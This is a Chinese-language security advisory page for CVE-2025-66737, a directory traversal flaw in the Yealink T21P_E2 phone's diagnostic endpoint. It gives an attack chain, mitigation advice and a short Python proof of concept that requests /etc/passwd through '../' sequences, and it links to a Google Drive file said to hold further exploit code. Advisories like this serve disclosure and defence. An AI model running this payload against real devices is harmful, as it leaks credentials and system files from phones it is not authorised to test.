CVE-2025-66737 CVSS 4.3 中危

CVE-2025-66737: Yealink T21P_E2 Phone 目录遍历漏洞

披露日期: 2025-12-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-66737

漏洞类型

目录遍历

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Yealink T21P_E2 Phone

漏洞概述

CVE-2025-66737是影响Yealink T21P_E2 Phone固件版本52.84.0.15的目录遍历漏洞。该漏洞存在于设备的诊断组件中，允许具有普通权限的远程攻击者通过构造特殊的请求来访问系统上的任意文件。攻击者无需高级权限或用户交互即可利用此漏洞，成功利用可导致敏感配置文件、凭据、系统信息等机密数据泄露。由于Yealink IP电话广泛应用于企业通信环境，此漏洞可能对企业网络安全构成中等程度威胁，攻击者可利用泄露的信息进行进一步的攻击活动。

技术细节

该漏洞是典型的路径遍历（Directory Traversal）安全问题，存在于Yealink T21P_E2 Phone的诊断功能模块中。漏洞根源在于应用程序对用户输入的文件路径缺乏充分的验证和过滤，攻击者可以使用"../"等路径遍历序列来跳出预期目录，访问系统任意文件。攻击者通过向诊断组件发送精心构造的HTTP请求，利用read函数读取目标文件内容。由于该功能设计为诊断用途，攻击行为较为隐蔽。建议通过Google Drive链接获取漏洞详情和PoC代码进行深入分析。防御方面需厂商发布安全补丁，用户应关注官方固件更新。

攻击链分析

STEP 1

步骤1

攻击者识别目标设备为Yealink T21P_E2 Phone，通过端口扫描发现诊断服务端口开放

STEP 2

步骤2

攻击者构造包含路径遍历序列的恶意请求，如使用../遍历目录结构

STEP 3

步骤3

发送精心构造的HTTP请求到诊断组件的read功能端点

STEP 4

步骤4

服务器未正确验证路径参数，返回请求的敏感文件内容

STEP 5

步骤5

攻击者获取系统配置文件、凭据等信息，可能用于后续横向移动或持久化攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-66737 PoC - Yealink T21P_E2 Phone Directory Traversal
# Target: Yealink T21P_E2 Phone (Firmware <= 52.84.0.15)

target_ip = "<target_ip>"
# Construct path traversal payload to read sensitive files
# Common targets: /etc/passwd, config files, credentials
payload = "/..//..//..//..//..//..//etc/passwd"

url = f"http://{target_ip}/diagnostic/read{payload}"

try:
    response = requests.get(url, timeout=10)
    if response.status_code == 200:
        print(f"[+] File content retrieved:")
        print(response.text)
    else:
        print(f"[-] Request failed with status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Connection error: {e}")

影响范围

Yealink T21P_E2 Phone 固件 <= 52.84.0.15

防御指南

临时缓解措施

在厂商发布修复补丁前，建议通过防火墙限制对IP电话诊断端口的访问，仅允许可信管理网段访问。同时监控设备日志，关注异常的目录遍历访问模式。考虑暂时禁用不必要的诊断功能，并及时关注Yealink官方安全公告。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66737
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66737
3 Details https://www.cvedetails.com/cve/CVE-2025-66737/
4 VulDB https://vuldb.com/cve/CVE-2025-66737
5 Link http://yealink.com
6 Link https://drive.google.com/file/d/1MpxnCL4koKupqWWDmY3ljlybjIPD8ieD/view?usp=sharing

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表